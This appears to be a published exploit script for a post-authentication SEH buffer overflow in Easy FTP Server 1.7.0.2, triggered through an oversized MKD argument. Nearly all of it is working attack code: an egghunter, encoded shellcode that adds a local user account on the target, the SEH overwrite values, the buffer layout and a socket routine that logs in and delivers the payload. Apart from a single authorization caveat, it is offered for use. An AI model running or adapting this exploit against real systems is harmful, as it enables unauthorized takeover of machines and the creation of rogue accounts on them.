Easy FTP Server 1.7.0.2 Buffer Overflow (post-authentication SEH overwrite via MKD)
Posted on 01 June 2011
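#!/usr/bin/python
# Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
# Original Author: dookie2000ca || Windows XP SP3 Professional
# Author: b33f || Windows XP Home SP1
# Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
"""Easy FTP Server 1.7.0.2 post-authentication SEH overflow (MKD argument).

The script logs in with a valid account, then sends an oversized MKD
argument that overwrites the SEH record.  The handler address is a
pop/pop/ret in rpcrt4.dll for the Windows XP builds named above; other
builds need a different address.  The shellcode carried in the buffer is
the Metasploit win32_adduser payload noted below, i.e. it creates a local
account on the target -- only run this against systems you are authorized
to test.

Usage: python exploit.py [host] [port] [user] [password]
"""
import socket
import sys

#-------------------------------------------------------------------------------
# SE Handler is overwritten - offset to SEH 256
# short jump \xEB\x07
# pop pop ret rpcrt4.dll 78011926
# badchars 0x00 0x0a 0x2f 0x5c
#-------------------------------------------------------------------------------

DEFAULT_HOST = "192.168.1.70"
DEFAULT_PORT = 21
DEFAULT_USER = "b33f"
DEFAULT_PASS = "b33f"

# Bytes that must not appear anywhere in the MKD argument (see header above).
BADCHARS = b"\x00\x0a\x2f\x5c"

# Egg tag.  The hunter compares it twice in a row (scasd/jne/scasd/jne), so the
# marker in front of the shellcode is "w00tw00t".
EGG = b"w00t"

# 32-byte int 0x2e egghunter; bytes 18-21 hold the tag it searches for.
EGGHUNTER = (
    b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
    + EGG  # egghunter marker w00t
    + b"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
)

# win32_adduser - PASS=u EXITFUNC=seh USER=fuck Size=228 Encoder=ShikataGaNai
SHELLCODE = (
    b"\xdb\xd3\x31\xc9\xb8\x5d\x82\xf8\x52\xb1\x34\xd9\x74\x24\xf4\x5f"
    b"\x83\xc7\x04\x31\x47\x13\x03\x1a\x91\x1a\xa7\x58\x7d\x9e\x48\xa0"
    b"\x7e\x94\x0c\x9c\xf5\xd6\x8b\xa4\x08\xc8\x1f\x1b\x13\x9d\x7f\x83"
    b"\x22\x4a\x36\x48\x10\x07\xc8\xa0\x68\xd7\x52\x90\x0f\x17\x10\xef"
    b"\xce\x52\xd4\xee\x12\x89\x13\xcb\xc6\x6a\xd8\x5e\x02\xf9\xbf\x84"
    b"\xcd\x15\x59\x4f\xc1\xa2\x2d\x10\xc6\x35\xd9\x25\xea\xbe\x1c\xd2"
    b"\x9a\x9d\x3a\x20\x5e\x2c\x83\x4c\xeb\x0f\x33\x09\x2b\xf7\x3f\x9a"
    b"\xec\x04\xcb\xec\xf0\xb9\x40\x64\x01\x29\x5f\xff\x91\x1d\x60\xff"
    b"\x91\xd6\x09\xc3\xce\xd9\x3f\x5b\xa7\x90\x38\x18\x87\xd8\xe8\x76"
    b"\xf8\x95\x0d\xd9\x90\x31\xf3\x6f\x6e\x15\xf3\x88\x0c\xf4\x6f\x78"
    b"\xb6\x7e\x15\xa4\x17\x1c\xf5\xca\x02\x96\xd5\x67\xbe\x33\x64\xa7"
    b"\x26\xc9\xeb\xcc\x86\x44\xcc\x3d\x86\xe2\x48\x61\x2e\xcd\x70\x0f"
    b"\x4b\x65\x51\xa3\xfc\xe6\xf0\x57\x64\x9b\x9d\xd2\x1a\x7b\x23\x78"
    b"\xb6\x12\xcd\xe9\x3b\x91\x63\x88\xcf\x36\xf6\x39\x10\xaf\x83\xde"
    b"\x3b\x0f\x43\x61\xf8\x0b\x9b"
)

# nSEH: short jmp +7 (over the handler address) padded with two NOPs.
NSEH = b"\xEB\x07\x90\x90"
# SEH: 0x78011926, pop pop ret in rpcrt4.dll, little-endian.
SEH = b"\x26\x19\x01\x78"


def build_payload():
    """Return the MKD argument that overwrites the SEH record.

    Layout (offsets from the start of the argument):
      0    7 bytes of filler
      7    "w00tw00t" egg marker immediately followed by the shellcode
      256  nSEH (short jmp +7)
      260  SEH  (pop/pop/ret address)
      264  25-byte NOP sled, then the egghunter, then 133 bytes of filler
    """
    return (
        b"A" * 7
        + EGG + EGG
        + SHELLCODE
        + b"A" * 10
        + NSEH
        + SEH
        + b"\x90" * 25
        + EGGHUNTER
        + b"A" * 133
    )


def main(argv=None):
    """Log in, send the overflow, and return a process exit status.

    argv: optional [host, port, user, password]; defaults to sys.argv[1:]
    and falls back to the DEFAULT_* constants for anything not supplied.
    """
    argv = sys.argv[1:] if argv is None else argv
    host = argv[0] if len(argv) > 0 else DEFAULT_HOST
    port = int(argv[1]) if len(argv) > 1 else DEFAULT_PORT
    user = argv[2] if len(argv) > 2 else DEFAULT_USER
    password = argv[3] if len(argv) > 3 else DEFAULT_PASS

    payload = build_payload()
    # Fail fast rather than sending a buffer the server would mangle.
    bad = [c for c in BADCHARS if c in payload]
    if bad:
        sys.stderr.write("payload contains bad characters: %r\n" % (bad,))
        return 1

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Bounded waits: the server typically stops answering once the SEH
    # handler is hijacked, and a hung recv() would otherwise block forever.
    sock.settimeout(10)
    try:
        sock.connect((host, port))
        sock.recv(1024)  # banner
        sock.send(b"USER " + user.encode() + b"\r\n")
        sock.recv(1024)
        sock.send(b"PASS " + password.encode() + b"\r\n")
        reply = sock.recv(1024)
        # This is a post-authentication bug: only send the overflow once the
        # server has accepted the credentials (230 = "user logged in").
        if not reply.startswith(b"230"):
            sys.stderr.write("login failed: %r\n" % (reply,))
            return 1
        sock.send(b"MKD " + payload + b"\r\n")
        try:
            sock.recv(1024)
            sock.send(b"QUIT\r\n")
        except socket.error:
            # Expected once the overflow fires: no reply or a reset.
            pass
    finally:
        sock.close()
    return 0


if __name__ == "__main__":
    sys.exit(main())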
